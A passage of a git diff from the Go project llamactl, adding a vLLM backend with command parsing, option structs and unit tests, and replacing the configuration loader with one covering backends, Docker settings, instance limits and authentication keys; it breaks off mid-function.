func parseFlags(args []string, multiValuedFlags map[string]bool) (map[string]any, error) {
options := make(map[string]any)
for i := 0; i < len(args); i++ {
arg := args[i]
if !strings.HasPrefix(arg, "-") {
continue
}
// Check for malformed flags (more than two leading dashes)
if strings.HasPrefix(arg, "---") {
return nil, fmt.Errorf("malformed flag: %s", arg)
}
// Get flag name and value
var flagName, value string
var hasValue bool
if strings.Contains(arg, "=") {
parts := strings.SplitN(arg, "=", 2)
flagName = strings.TrimLeft(parts[0], "-")
value = parts[1]
hasValue = true
} else {
flagName = strings.TrimLeft(arg, "-")
if i+1 < len(args) && !strings.HasPrefix(args[i+1], "-") {
value = args[i+1]
hasValue = true
i++ // Skip next arg since we consumed it
}
}
// Convert kebab-case to snake_case for JSON
flagName = strings.ReplaceAll(flagName, "-", "_")
if hasValue {
// Handle multi-valued flags
if multiValuedFlags[flagName] {
if existing, ok := options[flagName].([]string); ok {
options[flagName] = append(existing, value)
} else {
options[flagName] = []string{value}
}
} else {
options[flagName] = parseValue(value)
}
} else {
// Boolean flag
options[flagName] = true
}
}
return options, nil
}
// parseValue converts string to appropriate type
func parseValue(value string) any {
// Remove quotes
if len(value) >= 2 {
if (value[0] == '"' && value[len(value)-1] == '"') || (value[0] == '\'' && value[len(value)-1] == '\'') {
value = value[1 : len(value)-1]
}
}
// Try boolean
switch strings.ToLower(value) {
case "true":
return true
case "false":
return false
}
// Try integer
if intVal, err := strconv.Atoi(value); err == nil {
return intVal
}
// Try float
if floatVal, err := strconv.ParseFloat(value, 64); err == nil {
return floatVal
}
// Return as string
return value
}

200
pkg/backends/vllm/vllm.go Normal file
View File

@@ -0,0 +1,200 @@
package vllm
import (
"llamactl/pkg/backends"
)
// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated
var multiValuedFlags = map[string]bool{
"api-key": true,
"allowed-origins": true,
"allowed-methods": true,
"allowed-headers": true,
"middleware": true,
}
type VllmServerOptions struct {
// Basic connection options (auto-assigned by llamactl)
Host string `json:"host,omitempty"`
Port int `json:"port,omitempty"`
// Model and engine configuration
Model string `json:"model,omitempty"`
Tokenizer string `json:"tokenizer,omitempty"`
SkipTokenizerInit bool `json:"skip_tokenizer_init,omitempty"`
Revision string `json:"revision,omitempty"`
CodeRevision string `json:"code_revision,omitempty"`
TokenizerRevision string `json:"tokenizer_revision,omitempty"`
TokenizerMode string `json:"tokenizer_mode,omitempty"`
TrustRemoteCode bool `json:"trust_remote_code,omitempty"`
DownloadDir string `json:"download_dir,omitempty"`
LoadFormat string `json:"load_format,omitempty"`
ConfigFormat string `json:"config_format,omitempty"`
Dtype string `json:"dtype,omitempty"`
KVCacheDtype string `json:"kv_cache_dtype,omitempty"`
QuantizationParamPath string `json:"quantization_param_path,omitempty"`
Seed int `json:"seed,omitempty"`
MaxModelLen int `json:"max_model_len,omitempty"`
GuidedDecodingBackend string `json:"guided_decoding_backend,omitempty"`
DistributedExecutorBackend string `json:"distributed_executor_backend,omitempty"`
WorkerUseRay bool `json:"worker_use_ray,omitempty"`
RayWorkersUseNSight bool `json:"ray_workers_use_nsight,omitempty"`
// Performance and serving configuration
BlockSize int `json:"block_size,omitempty"`
EnablePrefixCaching bool `json:"enable_prefix_caching,omitempty"`
DisableSlidingWindow bool `json:"disable_sliding_window,omitempty"`
UseV2BlockManager bool `json:"use_v2_block_manager,omitempty"`
NumLookaheadSlots int `json:"num_lookahead_slots,omitempty"`
SwapSpace int `json:"swap_space,omitempty"`
CPUOffloadGB int `json:"cpu_offload_gb,omitempty"`
GPUMemoryUtilization float64 `json:"gpu_memory_utilization,omitempty"`
NumGPUBlocksOverride int `json:"num_gpu_blocks_override,omitempty"`
MaxNumBatchedTokens int `json:"max_num_batched_tokens,omitempty"`
MaxNumSeqs int `json:"max_num_seqs,omitempty"`
MaxLogprobs int `json:"max_logprobs,omitempty"`
DisableLogStats bool `json:"disable_log_stats,omitempty"`
Quantization string `json:"quantization,omitempty"`
RopeScaling string `json:"rope_scaling,omitempty"`
RopeTheta float64 `json:"rope_theta,omitempty"`
EnforceEager bool `json:"enforce_eager,omitempty"`
MaxContextLenToCapture int `json:"max_context_len_to_capture,omitempty"`
MaxSeqLenToCapture int `json:"max_seq_len_to_capture,omitempty"`
DisableCustomAllReduce bool `json:"disable_custom_all_reduce,omitempty"`
TokenizerPoolSize int `json:"tokenizer_pool_size,omitempty"`
TokenizerPoolType string `json:"tokenizer_pool_type,omitempty"`
TokenizerPoolExtraConfig string `json:"tokenizer_pool_extra_config,omitempty"`
EnableLoraBias bool `json:"enable_lora_bias,omitempty"`
LoraExtraVocabSize int `json:"lora_extra_vocab_size,omitempty"`
LoraRank int `json:"lora_rank,omitempty"`
PromptLookbackDistance int `json:"prompt_lookback_distance,omitempty"`
PreemptionMode string `json:"preemption_mode,omitempty"`
// Distributed and parallel processing
TensorParallelSize int `json:"tensor_parallel_size,omitempty"`
PipelineParallelSize int `json:"pipeline_parallel_size,omitempty"`
MaxParallelLoadingWorkers int `json:"max_parallel_loading_workers,omitempty"`
DisableAsyncOutputProc bool `json:"disable_async_output_proc,omitempty"`
WorkerClass string `json:"worker_class,omitempty"`
EnabledLoraModules string `json:"enabled_lora_modules,omitempty"`
MaxLoraRank int `json:"max_lora_rank,omitempty"`
FullyShardedLoras bool `json:"fully_sharded_loras,omitempty"`
LoraModules string `json:"lora_modules,omitempty"`
PromptAdapters string `json:"prompt_adapters,omitempty"`
MaxPromptAdapterToken int `json:"max_prompt_adapter_token,omitempty"`
Device string `json:"device,omitempty"`
SchedulerDelay float64 `json:"scheduler_delay,omitempty"`
EnableChunkedPrefill bool `json:"enable_chunked_prefill,omitempty"`
SpeculativeModel string `json:"speculative_model,omitempty"`
SpeculativeModelQuantization string `json:"speculative_model_quantization,omitempty"`
SpeculativeRevision string `json:"speculative_revision,omitempty"`
SpeculativeMaxModelLen int `json:"speculative_max_model_len,omitempty"`
SpeculativeDisableByBatchSize int `json:"speculative_disable_by_batch_size,omitempty"`
NgptSpeculativeLength int `json:"ngpt_speculative_length,omitempty"`
SpeculativeDisableMqa bool `json:"speculative_disable_mqa,omitempty"`
ModelLoaderExtraConfig string `json:"model_loader_extra_config,omitempty"`
IgnorePatterns string `json:"ignore_patterns,omitempty"`
PreloadedLoraModules string `json:"preloaded_lora_modules,omitempty"`
// OpenAI server specific options
UDS string `json:"uds,omitempty"`
UvicornLogLevel string `json:"uvicorn_log_level,omitempty"`
ResponseRole string `json:"response_role,omitempty"`
SSLKeyfile string `json:"ssl_keyfile,omitempty"`
SSLCertfile string `json:"ssl_certfile,omitempty"`
SSLCACerts string `json:"ssl_ca_certs,omitempty"`
SSLCertReqs int `json:"ssl_cert_reqs,omitempty"`
RootPath string `json:"root_path,omitempty"`
Middleware []string `json:"middleware,omitempty"`
ReturnTokensAsTokenIDS bool `json:"return_tokens_as_token_ids,omitempty"`
DisableFrontendMultiprocessing bool `json:"disable_frontend_multiprocessing,omitempty"`
EnableAutoToolChoice bool `json:"enable_auto_tool_choice,omitempty"`
ToolCallParser string `json:"tool_call_parser,omitempty"`
ToolServer string `json:"tool_server,omitempty"`
ChatTemplate string `json:"chat_template,omitempty"`
ChatTemplateContentFormat string `json:"chat_template_content_format,omitempty"`
AllowCredentials bool `json:"allow_credentials,omitempty"`
AllowedOrigins []string `json:"allowed_origins,omitempty"`
AllowedMethods []string `json:"allowed_methods,omitempty"`
AllowedHeaders []string `json:"allowed_headers,omitempty"`
APIKey []string `json:"api_key,omitempty"`
EnableLogOutputs bool `json:"enable_log_outputs,omitempty"`
EnableTokenUsage bool `json:"enable_token_usage,omitempty"`
EnableAsyncEngineDebug bool `json:"enable_async_engine_debug,omitempty"`
EngineUseRay bool `json:"engine_use_ray,omitempty"`
DisableLogRequests bool `json:"disable_log_requests,omitempty"`
MaxLogLen int `json:"max_log_len,omitempty"`
// Additional engine configuration
Task string `json:"task,omitempty"`
MultiModalConfig string `json:"multi_modal_config,omitempty"`
LimitMmPerPrompt string `json:"limit_mm_per_prompt,omitempty"`
EnableSleepMode bool `json:"enable_sleep_mode,omitempty"`
EnableChunkingRequest bool `json:"enable_chunking_request,omitempty"`
CompilationConfig string `json:"compilation_config,omitempty"`
DisableSlidingWindowMask bool `json:"disable_sliding_window_mask,omitempty"`
EnableTRTLLMEngineLatency bool `json:"enable_trtllm_engine_latency,omitempty"`
OverridePoolingConfig string `json:"override_pooling_config,omitempty"`
OverrideNeuronConfig string `json:"override_neuron_config,omitempty"`
OverrideKVCacheALIGNSize int `json:"override_kv_cache_align_size,omitempty"`
}
// BuildCommandArgs converts VllmServerOptions to command line arguments
// For vLLM native, model is a positional argument after "serve"
func (o *VllmServerOptions) BuildCommandArgs() []string {
var args []string
// Add model as positional argument if specified (for native execution)
if o.Model != "" {
args = append(args, o.Model)
}
// Create a copy without Model field to avoid --model flag
optionsCopy := *o
optionsCopy.Model = ""
// Use package-level multipleFlags variable
flagArgs := backends.BuildCommandArgs(&optionsCopy, multiValuedFlags)
args = append(args, flagArgs...)
return args
}
func (o *VllmServerOptions) BuildDockerArgs() []string {
var args []string
// Use package-level multipleFlags variable
flagArgs := backends.BuildCommandArgs(o, multiValuedFlags)
args = append(args, flagArgs...)
return args
}
// ParseVllmCommand parses a vLLM serve command string into VllmServerOptions
// Supports multiple formats:
// 1. Full command: "vllm serve --model MODEL_NAME --other-args"
// 2. Full path: "/usr/local/bin/vllm serve --model MODEL_NAME"
// 3. Serve only: "serve --model MODEL_NAME --other-args"
// 4. Args only: "--model MODEL_NAME --other-args"
// 5. Multiline commands with backslashes
func ParseVllmCommand(command string) (*VllmServerOptions, error) {
executableNames := []string{"vllm"}
subcommandNames := []string{"serve"}
multiValuedFlags := map[string]bool{
"middleware": true,
"api_key": true,
"allowed_origins": true,
"allowed_methods": true,
"allowed_headers": true,
"lora_modules": true,
"prompt_adapters": true,
}
var vllmOptions VllmServerOptions
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &vllmOptions); err != nil {
return nil, err
}
return &vllmOptions, nil
}

View File

@@ -0,0 +1,153 @@
package vllm_test
import (
"llamactl/pkg/backends/vllm"
"slices"
"testing"
)
func TestParseVllmCommand(t *testing.T) {
tests := []struct {
name string
command string
expectErr bool
}{
{
name: "basic vllm serve command",
command: "vllm serve microsoft/DialoGPT-medium",
expectErr: false,
},
{
name: "serve only command",
command: "serve microsoft/DialoGPT-medium",
expectErr: false,
},
{
name: "positional model with flags",
command: "vllm serve microsoft/DialoGPT-medium --tensor-parallel-size 2",
expectErr: false,
},
{
name: "model with path",
command: "vllm serve /path/to/model --gpu-memory-utilization 0.8",
expectErr: false,
},
{
name: "empty command",
command: "",
expectErr: true,
},
{
name: "unterminated quote",
command: `vllm serve "unterminated`,
expectErr: true,
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result, err := vllm.ParseVllmCommand(tt.command)
if tt.expectErr {
if err == nil {
t.Errorf("expected error but got none")
}
return
}
if err != nil {
t.Errorf("unexpected error: %v", err)
return
}
if result == nil {
t.Errorf("expected result but got nil")
}
})
}
}
func TestParseVllmCommandValues(t *testing.T) {
command := "vllm serve test-model --tensor-parallel-size 4 --gpu-memory-utilization 0.8 --enable-log-outputs"
result, err := vllm.ParseVllmCommand(command)
if err != nil {
t.Fatalf("unexpected error: %v", err)
}
if result.Model != "test-model" {
t.Errorf("expected model 'test-model', got '%s'", result.Model)
}
if result.TensorParallelSize != 4 {
t.Errorf("expected tensor_parallel_size 4, got %d", result.TensorParallelSize)
}
if result.GPUMemoryUtilization != 0.8 {
t.Errorf("expected gpu_memory_utilization 0.8, got %f", result.GPUMemoryUtilization)
}
if !result.EnableLogOutputs {
t.Errorf("expected enable_log_outputs true, got %v", result.EnableLogOutputs)
}
}
func TestBuildCommandArgs(t *testing.T) {
options := vllm.VllmServerOptions{
Model: "microsoft/DialoGPT-medium",
Port: 8080,
Host: "localhost",
TensorParallelSize: 2,
GPUMemoryUtilization: 0.8,
EnableLogOutputs: true,
AllowedOrigins: []string{"http://localhost:3000", "https://example.com"},
}
args := options.BuildCommandArgs()
// Check that model is the first positional argument (not a --model flag)
if len(args) == 0 || args[0] != "microsoft/DialoGPT-medium" {
t.Errorf("Expected model 'microsoft/DialoGPT-medium' as first positional argument, got args: %v", args)
}
// Check that --model flag is NOT present (since model should be positional)
if contains(args, "--model") {
t.Errorf("Found --model flag, but model should be positional argument in args: %v", args)
}
// Check other flags
if !containsFlagWithValue(args, "--tensor-parallel-size", "2") {
t.Errorf("Expected --tensor-parallel-size 2 not found in %v", args)
}
if !contains(args, "--enable-log-outputs") {
t.Errorf("Expected --enable-log-outputs not found in %v", args)
}
if !contains(args, "--host") {
t.Errorf("Expected --host not found in %v", args)
}
if !contains(args, "--port") {
t.Errorf("Expected --port not found in %v", args)
}
// Check array handling (multiple flags)
allowedOriginsCount := 0
for i := range args {
if args[i] == "--allowed-origins" {
allowedOriginsCount++
}
}
if allowedOriginsCount != 2 {
t.Errorf("Expected 2 --allowed-origins flags, got %d", allowedOriginsCount)
}
}
// Helper functions
func contains(slice []string, item string) bool {
return slices.Contains(slice, item)
}
func containsFlagWithValue(args []string, flag, value string) bool {
for i, arg := range args {
if arg == flag && i+1 < len(args) && args[i+1] == value {
return true
}
}
return false
}

View File

@@ -1,295 +0,0 @@
package llamactl
import (
"os"
"path/filepath"
"runtime"
"strconv"
"strings"
"gopkg.in/yaml.v3"
)
// Config represents the configuration for llamactl
type Config struct {
Server ServerConfig `yaml:"server"`
Instances InstancesConfig `yaml:"instances"`
Auth AuthConfig `yaml:"auth"`
}
// ServerConfig contains HTTP server configuration
type ServerConfig struct {
// Server host to bind to
Host string `yaml:"host"`
// Server port to bind to
Port int `yaml:"port"`
// Allowed origins for CORS (e.g., "http://localhost:3000")
AllowedOrigins []string `yaml:"allowed_origins"`
// Enable Swagger UI for API documentation
EnableSwagger bool `yaml:"enable_swagger"`
}
// InstancesConfig contains instance management configuration
type InstancesConfig struct {
// Port range for instances (e.g., 8000,9000)
PortRange [2]int `yaml:"port_range"`
// Directory where instance logs will be stored
LogDirectory string `yaml:"log_directory"`
// Maximum number of instances that can be created
MaxInstances int `yaml:"max_instances"`
// Path to llama-server executable
LlamaExecutable string `yaml:"llama_executable"`
// Default auto-restart setting for new instances
DefaultAutoRestart bool `yaml:"default_auto_restart"`
// Default max restarts for new instances
DefaultMaxRestarts int `yaml:"default_max_restarts"`
// Default restart delay for new instances (in seconds)
DefaultRestartDelay int `yaml:"default_restart_delay"`
}
// AuthConfig contains authentication settings
type AuthConfig struct {
// Require authentication for OpenAI compatible inference endpoints
RequireInferenceAuth bool `yaml:"require_inference_auth"`
// List of keys for OpenAI compatible inference endpoints
InferenceKeys []string `yaml:"inference_keys"`
// Require authentication for management endpoints
RequireManagementAuth bool `yaml:"require_management_auth"`
// List of keys for management endpoints
ManagementKeys []string `yaml:"management_keys"`
}
// LoadConfig loads configuration with the following precedence:
// 1. Hardcoded defaults
// 2. Config file
// 3. Environment variables
func LoadConfig(configPath string) (Config, error) {
// 1. Start with defaults
cfg := Config{
Server: ServerConfig{
Host: "0.0.0.0",
Port: 8080,
AllowedOrigins: []string{"*"}, // Default to allow all origins
EnableSwagger: false,
},
Instances: InstancesConfig{
PortRange: [2]int{8000, 9000},
LogDirectory: "/tmp/llamactl",
MaxInstances: -1, // -1 means unlimited
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
},
Auth: AuthConfig{
RequireInferenceAuth: true,
InferenceKeys: []string{},
RequireManagementAuth: true,
ManagementKeys: []string{},
},
}
// 2. Load from config file
if err := loadConfigFile(&cfg, configPath); err != nil {
return cfg, err
}
// 3. Override with environment variables
loadEnvVars(&cfg)
return cfg, nil
}
// loadConfigFile attempts to load config from file with fallback locations
func loadConfigFile(cfg *Config, configPath string) error {
var configLocations []string
// If specific config path provided, use only that
if configPath != "" {
configLocations = []string{configPath}
} else {
// Default config file locations (in order of precedence)
configLocations = getDefaultConfigLocations()
}
for _, path := range configLocations {
if data, err := os.ReadFile(path); err == nil {
if err := yaml.Unmarshal(data, cfg); err != nil {
return err
}
return nil
}
}
return nil
}
// loadEnvVars overrides config with environment variables
func loadEnvVars(cfg *Config) {
// Server config
if host := os.Getenv("LLAMACTL_HOST"); host != "" {
cfg.Server.Host = host
}
if port := os.Getenv("LLAMACTL_PORT"); port != "" {
if p, err := strconv.Atoi(port); err == nil {
cfg.Server.Port = p
}
}
if allowedOrigins := os.Getenv("LLAMACTL_ALLOWED_ORIGINS"); allowedOrigins != "" {
cfg.Server.AllowedOrigins = strings.Split(allowedOrigins, ",")
}
if enableSwagger := os.Getenv("LLAMACTL_ENABLE_SWAGGER"); enableSwagger != "" {
if b, err := strconv.ParseBool(enableSwagger); err == nil {
cfg.Server.EnableSwagger = b
}
}
// Instance config
if portRange := os.Getenv("LLAMACTL_INSTANCE_PORT_RANGE"); portRange != "" {
if ports := ParsePortRange(portRange); ports != [2]int{0, 0} {
cfg.Instances.PortRange = ports
}
}
if logDir := os.Getenv("LLAMACTL_LOG_DIR"); logDir != "" {
cfg.Instances.LogDirectory = logDir
}
if maxInstances := os.Getenv("LLAMACTL_MAX_INSTANCES"); maxInstances != "" {
if m, err := strconv.Atoi(maxInstances); err == nil {
cfg.Instances.MaxInstances = m
}
}
if llamaExec := os.Getenv("LLAMACTL_LLAMA_EXECUTABLE"); llamaExec != "" {
cfg.Instances.LlamaExecutable = llamaExec
}
if autoRestart := os.Getenv("LLAMACTL_DEFAULT_AUTO_RESTART"); autoRestart != "" {
if b, err := strconv.ParseBool(autoRestart); err == nil {
cfg.Instances.DefaultAutoRestart = b
}
}
if maxRestarts := os.Getenv("LLAMACTL_DEFAULT_MAX_RESTARTS"); maxRestarts != "" {
if m, err := strconv.Atoi(maxRestarts); err == nil {
cfg.Instances.DefaultMaxRestarts = m
}
}
if restartDelay := os.Getenv("LLAMACTL_DEFAULT_RESTART_DELAY"); restartDelay != "" {
if seconds, err := strconv.Atoi(restartDelay); err == nil {
cfg.Instances.DefaultRestartDelay = seconds
}
}
// Auth config
if requireInferenceAuth := os.Getenv("LLAMACTL_REQUIRE_INFERENCE_AUTH"); requireInferenceAuth != "" {
if b, err := strconv.ParseBool(requireInferenceAuth); err == nil {
cfg.Auth.RequireInferenceAuth = b
}
}
if inferenceKeys := os.Getenv("LLAMACTL_INFERENCE_KEYS"); inferenceKeys != "" {
cfg.Auth.InferenceKeys = strings.Split(inferenceKeys, ",")
}
if requireManagementAuth := os.Getenv("LLAMACTL_REQUIRE_MANAGEMENT_AUTH"); requireManagementAuth != "" {
if b, err := strconv.ParseBool(requireManagementAuth); err == nil {
cfg.Auth.RequireManagementAuth = b
}
}
if managementKeys := os.Getenv("LLAMACTL_MANAGEMENT_KEYS"); managementKeys != "" {
cfg.Auth.ManagementKeys = strings.Split(managementKeys, ",")
}
}
// ParsePortRange parses port range from string formats like "8000-9000" or "8000,9000"
func ParsePortRange(s string) [2]int {
var parts []string
// Try both separators
if strings.Contains(s, "-") {
parts = strings.Split(s, "-")
} else if strings.Contains(s, ",") {
parts = strings.Split(s, ",")
}
// Parse the two parts
if len(parts) == 2 {
start, err1 := strconv.Atoi(strings.TrimSpace(parts[0]))
end, err2 := strconv.Atoi(strings.TrimSpace(parts[1]))
if err1 == nil && err2 == nil {
return [2]int{start, end}
}
}
return [2]int{0, 0} // Invalid format
}
// getDefaultConfigLocations returns platform-specific config file locations
func getDefaultConfigLocations() []string {
var locations []string
// Current directory (cross-platform)
locations = append(locations,
"./llamactl.yaml",
"./config.yaml",
)
homeDir, _ := os.UserHomeDir()
switch runtime.GOOS {
case "windows":
// Windows: Use APPDATA and ProgramData
if appData := os.Getenv("APPDATA"); appData != "" {
locations = append(locations, filepath.Join(appData, "llamactl", "config.yaml"))
}
if programData := os.Getenv("PROGRAMDATA"); programData != "" {
locations = append(locations, filepath.Join(programData, "llamactl", "config.yaml"))
}
// Fallback to user home
if homeDir != "" {
locations = append(locations, filepath.Join(homeDir, "llamactl", "config.yaml"))
}
case "darwin":
// macOS: Use proper Application Support directories
if homeDir != "" {
locations = append(locations,
filepath.Join(homeDir, "Library", "Application Support", "llamactl", "config.yaml"),
filepath.Join(homeDir, ".config", "llamactl", "config.yaml"), // XDG fallback
)
}
locations = append(locations, "/Library/Application Support/llamactl/config.yaml")
locations = append(locations, "/etc/llamactl/config.yaml") // Unix fallback
default:
// User config: $XDG_CONFIG_HOME/llamactl/config.yaml or ~/.config/llamactl/config.yaml
configHome := os.Getenv("XDG_CONFIG_HOME")
if configHome == "" && homeDir != "" {
configHome = filepath.Join(homeDir, ".config")
}
if configHome != "" {
locations = append(locations, filepath.Join(configHome, "llamactl", "config.yaml"))
}
// System config: /etc/llamactl/config.yaml
locations = append(locations, "/etc/llamactl/config.yaml")
// Additional system locations
if xdgConfigDirs := os.Getenv("XDG_CONFIG_DIRS"); xdgConfigDirs != "" {
for dir := range strings.SplitSeq(xdgConfigDirs, ":") {
if dir != "" {
locations = append(locations, filepath.Join(dir, "llamactl", "config.yaml"))
}
}
}
}
return locations
}

562
pkg/config/config.go Normal file
View File

@@ -0,0 +1,562 @@
package config
import (
"log"
"os"
"path/filepath"
"runtime"
"strconv"
"strings"
"gopkg.in/yaml.v3"
)
// BackendSettings contains structured backend configuration
type BackendSettings struct {
Command string `yaml:"command"`
Args []string `yaml:"args"`
Environment map[string]string `yaml:"environment,omitempty"`
Docker *DockerSettings `yaml:"docker,omitempty"`
}
// DockerSettings contains Docker-specific configuration
type DockerSettings struct {
Enabled bool `yaml:"enabled"`
Image string `yaml:"image"`
Args []string `yaml:"args"`
Environment map[string]string `yaml:"environment,omitempty"`
}
// BackendConfig contains backend executable configurations
type BackendConfig struct {
LlamaCpp BackendSettings `yaml:"llama-cpp"`
VLLM BackendSettings `yaml:"vllm"`
MLX BackendSettings `yaml:"mlx"`
}
// AppConfig represents the configuration for llamactl
type AppConfig struct {
Server ServerConfig `yaml:"server"`
Backends BackendConfig `yaml:"backends"`
Instances InstancesConfig `yaml:"instances"`
Auth AuthConfig `yaml:"auth"`
Version string `yaml:"-"`
CommitHash string `yaml:"-"`
BuildTime string `yaml:"-"`
}
// ServerConfig contains HTTP server configuration
type ServerConfig struct {
// Server host to bind to
Host string `yaml:"host"`
// Server port to bind to
Port int `yaml:"port"`
// Allowed origins for CORS (e.g., "http://localhost:3000")
AllowedOrigins []string `yaml:"allowed_origins"`
// Enable Swagger UI for API documentation
EnableSwagger bool `yaml:"enable_swagger"`
}
// InstancesConfig contains instance management configuration
type InstancesConfig struct {
// Port range for instances (e.g., 8000,9000)
PortRange [2]int `yaml:"port_range"`
// Directory where all llamactl data will be stored (instances.json, logs, etc.)
DataDir string `yaml:"data_dir"`
// Instance config directory override
InstancesDir string `yaml:"configs_dir"`
// Logs directory override
LogsDir string `yaml:"logs_dir"`
// Automatically create the data directory if it doesn't exist
AutoCreateDirs bool `yaml:"auto_create_dirs"`
// Maximum number of instances that can be created
MaxInstances int `yaml:"max_instances"`
// Maximum number of instances that can be running at the same time
MaxRunningInstances int `yaml:"max_running_instances,omitempty"`
// Enable LRU eviction for instance logs
EnableLRUEviction bool `yaml:"enable_lru_eviction"`
// Default auto-restart setting for new instances
DefaultAutoRestart bool `yaml:"default_auto_restart"`
// Default max restarts for new instances
DefaultMaxRestarts int `yaml:"default_max_restarts"`
// Default restart delay for new instances (in seconds)
DefaultRestartDelay int `yaml:"default_restart_delay"`
// Default on-demand start setting for new instances
DefaultOnDemandStart bool `yaml:"default_on_demand_start"`
// How long to wait for an instance to start on demand (in seconds)
OnDemandStartTimeout int `yaml:"on_demand_start_timeout,omitempty"`
// Interval for checking instance timeouts (in minutes)
TimeoutCheckInterval int `yaml:"timeout_check_interval"`
}
// AuthConfig contains authentication settings
type AuthConfig struct {
// Require authentication for OpenAI compatible inference endpoints
RequireInferenceAuth bool `yaml:"require_inference_auth"`
// List of keys for OpenAI compatible inference endpoints
InferenceKeys []string `yaml:"inference_keys"`
// Require authentication for management endpoints
RequireManagementAuth bool `yaml:"require_management_auth"`
// List of keys for management endpoints
ManagementKeys []string `yaml:"management_keys"`
}
// LoadConfig loads configuration with the following precedence:
// 1. Hardcoded defaults
// 2. Config file
// 3. Environment variables
func LoadConfig(configPath string) (AppConfig, error) {
// 1. Start with defaults
cfg := AppConfig{
Server: ServerConfig{
Host: "0.0.0.0",
Port: 8080,
AllowedOrigins: []string{"*"}, // Default to allow all origins
EnableSwagger: false,
},
Backends: BackendConfig{
LlamaCpp: BackendSettings{
Command: "llama-server",
Args: []string{},
Environment: map[string]string{},
Docker: &DockerSettings{
Enabled: false,
Image: "ghcr.io/ggml-org/llama.cpp:server",
Args: []string{
"run", "--rm", "--network", "host", "--gpus", "all",
"-v", filepath.Join(getDefaultDataDirectory(), "llama.cpp") + ":/root/.cache/llama.cpp"},
Environment: map[string]string{},
},
},
VLLM: BackendSettings{
Command: "vllm",
Args: []string{"serve"},
Docker: &DockerSettings{
Enabled: false,
Image: "vllm/vllm-openai:latest",
Args: []string{
"run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g",
"-v", filepath.Join(getDefaultDataDirectory(), "huggingface") + ":/root/.cache/huggingface",
},
Environment: map[string]string{},
},
},
MLX: BackendSettings{
Command: "mlx_lm.server",
Args: []string{},
// No Docker section for MLX - not supported
},
},
Instances: InstancesConfig{
PortRange: [2]int{8000, 9000},
DataDir: getDefaultDataDirectory(),
// NOTE: empty strings are set as placeholder values since InstancesDir and LogsDir
// should be relative path to DataDir if not explicitly set.
InstancesDir: "",
LogsDir: "",
AutoCreateDirs: true,
MaxInstances: -1, // -1 means unlimited
MaxRunningInstances: -1, // -1 means unlimited
EnableLRUEviction: true,
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
DefaultOnDemandStart: true,
OnDemandStartTimeout: 120, // 2 minutes
TimeoutCheckInterval: 5, // Check timeouts every 5 minutes
},
Auth: AuthConfig{
RequireInferenceAuth: true,
InferenceKeys: []string{},
RequireManagementAuth: true,
ManagementKeys: []string{},
},
}
// 2. Load from config file
if err := loadConfigFile(&cfg, configPath); err != nil {
return cfg, err
}
// 3. Override with environment variables
loadEnvVars(&cfg)
// If InstancesDir or LogsDir is not set, set it to relative path of DataDir
if cfg.Instances.InstancesDir == "" {
cfg.Instances.InstancesDir = filepath.Join(cfg.Instances.DataDir, "instances")
}
if cfg.Instances.LogsDir == "" {
cfg.Instances.LogsDir = filepath.Join(cfg.Instances.DataDir, "logs")
}
return cfg, nil
}
// loadConfigFile attempts to load config from file with fallback locations
func loadConfigFile(cfg *AppConfig, configPath string) error {
var configLocations []string
// If specific config path provided, use only that
if configPath != "" {
configLocations = []string{configPath}
} else {
// Default config file locations (in order of precedence)
configLocations = getDefaultConfigLocations()
}
for _, path := range configLocations {
if data, err := os.ReadFile(path); err == nil {
if err := yaml.Unmarshal(data, cfg); err != nil {
return err
}
log.Printf("Read config at %s", path)
return nil
}
}
return nil
}
// loadEnvVars overrides config with environment variables
func loadEnvVars(cfg *AppConfig) {
// Server config
if host := os.Getenv("LLAMACTL_HOST"); host != "" {
cfg.Server.Host = host
}
if port := os.Getenv("LLAMACTL_PORT"); port != "" {
if p, err := strconv.Atoi(port); err == nil {
cfg.Server.Port = p
}
}
if allowedOrigins := os.Getenv("LLAMACTL_ALLOWED_ORIGINS"); allowedOrigins != "" {
cfg.Server.AllowedOrigins = strings.Split(allowedOrigins, ",")
}
if enableSwagger := os.Getenv("LLAMACTL_ENABLE_SWAGGER"); enableSwagger != "" {
if b, err := strconv.ParseBool(enableSwagger); err == nil {
cfg.Server.EnableSwagger = b
}
}
// Data config
if dataDir := os.Getenv("LLAMACTL_DATA_DIRECTORY"); dataDir != "" {
cfg.Instances.DataDir = dataDir
}
if instancesDir := os.Getenv("LLAMACTL_INSTANCES_DIR"); instancesDir != "" {
cfg.Instances.InstancesDir = instancesDir
}
if logsDir := os.Getenv("LLAMACTL_LOGS_DIR"); logsDir != "" {
cfg.Instances.LogsDir = logsDir
}
if autoCreate := os.Getenv("LLAMACTL_AUTO_CREATE_DATA_DIR"); autoCreate != "" {
if b, err := strconv.ParseBool(autoCreate); err == nil {
cfg.Instances.AutoCreateDirs = b
}
}
// Instance config
if portRange := os.Getenv("LLAMACTL_INSTANCE_PORT_RANGE"); portRange != "" {
if ports := ParsePortRange(portRange); ports != [2]int{0, 0} {
cfg.Instances.PortRange = ports
}
}
if maxInstances := os.Getenv("LLAMACTL_MAX_INSTANCES"); maxInstances != "" {
if m, err := strconv.Atoi(maxInstances); err == nil {
cfg.Instances.MaxInstances = m
}
}
if maxRunning := os.Getenv("LLAMACTL_MAX_RUNNING_INSTANCES"); maxRunning != "" {
if m, err := strconv.Atoi(maxRunning); err == nil {
cfg.Instances.MaxRunningInstances = m
}
}
if enableLRUEviction := os.Getenv("LLAMACTL_ENABLE_LRU_EVICTION"); enableLRUEviction != "" {
if b, err := strconv.ParseBool(enableLRUEviction); err == nil {
cfg.Instances.EnableLRUEviction = b
}
}
// Backend config
// LlamaCpp backend
if llamaCmd := os.Getenv("LLAMACTL_LLAMACPP_COMMAND"); llamaCmd != "" {
cfg.Backends.LlamaCpp.Command = llamaCmd
}
if llamaArgs := os.Getenv("LLAMACTL_LLAMACPP_ARGS"); llamaArgs != "" {
cfg.Backends.LlamaCpp.Args = strings.Split(llamaArgs, " ")
}
if llamaEnv := os.Getenv("LLAMACTL_LLAMACPP_ENV"); llamaEnv != "" {
if cfg.Backends.LlamaCpp.Environment == nil {
cfg.Backends.LlamaCpp.Environment = make(map[string]string)
}
